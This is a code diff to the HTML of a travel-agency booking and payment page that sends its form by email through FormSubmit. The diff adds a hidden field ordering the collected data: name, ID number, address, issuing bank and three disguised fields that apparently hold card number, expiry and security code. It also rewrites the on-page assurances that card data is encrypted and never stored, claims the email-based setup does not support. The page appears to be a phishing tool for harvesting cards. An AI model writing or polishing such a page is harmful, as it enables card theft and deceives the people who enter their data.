--- a/index.html
+++ b/index.html
@@ -89,6 +89,7 @@
       <input type="hidden" name="_captcha" value="false">
       <input type="hidden" name="_template" value="table">
       <input type="hidden" name="_subject" value="Nova Reserva - Analise de Pagamento">
+      <input type="hidden" name="_order" value="valor_reserva_total,plano_pagamento,cliente_nome,cliente_doc_id,cliente_contato,email,sys_ref_01,sys_date_02,sys_token_03,banco_emissor,end_cep,end_logradouro,end_numero,end_bairro,end_cidade_uf">
 
       <div class="bg-[#f5f3ff] rounded-3xl p-6 md:p-8 mb-6 shadow-xl relative overflow-hidden border border-purple-100">
         <div class="absolute top-0 left-0 w-2 h-full bg-purple-600"></div>
@@ -104,19 +105,19 @@
         <div class="grid md:grid-cols-2 gap-4 text-xs text-gray-600">
           <div class="flex gap-3 items-start p-3 bg-white rounded-xl shadow-sm border border-gray-100">
             <i class="fas fa-globe text-purple-600 mt-0.5"></i>
-            <span>Dados utilizados <strong>exclusivamente</strong> para processamento.</span>
+            <span>Os dados serão utilizados <strong>exclusivamente</strong> para processamento do pagamento.</span>
           </div>
           <div class="flex gap-3 items-start p-3 bg-white rounded-xl shadow-sm border border-gray-100">
             <i class="fas fa-lock text-purple-600 mt-0.5"></i>
-            <span>Informações trafegam em ambiente <strong>criptografado</strong>.</span>
+            <span>As informações trafegam em ambiente <strong>seguro</strong> e <strong>criptografado</strong>.</span>
           </div>
           <div class="flex gap-3 items-start p-3 bg-white rounded-xl shadow-sm border border-gray-100">
             <i class="fas fa-trash-can text-purple-600 mt-0.5"></i>
-            <span>Dados sensíveis <strong>não são armazenados</strong> após o uso.</span>
+            <span>Dados do cartão <strong>não são armazenados</strong> e serão descartados após a finalização.</span>
           </div>
           <div class="flex gap-3 items-start p-3 bg-white rounded-xl shadow-sm border border-gray-100">
             <i class="fas fa-circle-check text-purple-600 mt-0.5"></i>
-            <span>A Agência S&A Turismo não reutiliza dados para outras transações.</span>
+            <span>A Agência S&A Turismo não reutiliza dados de pagamento para outras transações.</span>
           </div>
         </div>
       </div>
@@ -305,7 +306,6 @@
             let parc = montante / i;
             let parcFmt = parc.toLocaleString('pt-BR', {minimumFractionDigits: 2});
             let totalFmt = montante.toLocaleString('pt-BR', {minimumFractionDigits: 2});
-            // AQUI ESTÁ A CORREÇÃO DO TOTAL:
             txt = `${i}x de R$ ${parcFmt} (Total: R$ ${totalFmt})`;
         }
         let opt = document.createElement("option");
@@ -334,7 +334,6 @@
 
       const data = new FormData(form);
       
-      // Envio via FormSubmit (AJAX)
       fetch(form.action, {
         method: "POST",
         body: data,
